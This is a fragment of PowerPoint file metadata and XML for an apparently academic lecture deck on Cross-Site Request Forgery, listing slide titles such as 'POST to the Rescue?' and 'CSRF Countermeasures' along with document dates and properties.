                <a:cs typeface="Consolas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&lt;/body&gt;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&lt;/html&gt;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0872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3-03 at 10.0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3 at 10.0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26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199" y="5480007"/>
            <a:ext cx="7055272" cy="356301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6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119439</TotalTime>
  <Words>977</Words>
  <Application>Microsoft Macintosh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adam_seclab_theme</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery</vt:lpstr>
      <vt:lpstr>HTML Review</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>How is the HTTP request created?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>HTML Forms Review</vt:lpstr>
      <vt:lpstr>HTML Links</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>From the Web Application's Perspective</vt:lpstr>
      <vt:lpstr>Even Worse</vt:lpstr>
      <vt:lpstr>Even Worse</vt:lpstr>
      <vt:lpstr>POST to the Rescue</vt:lpstr>
      <vt:lpstr>POST to the Rescue?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery</vt:lpstr>
      <vt:lpstr>CSRF Countermeasures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3648</cp:revision>
  <cp:lastPrinted>2011-10-05T20:20:50Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-09-20T20:28:25Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-03-03T19:41:46Z</dcterms:modified>
</cp:coreProperties>
</file>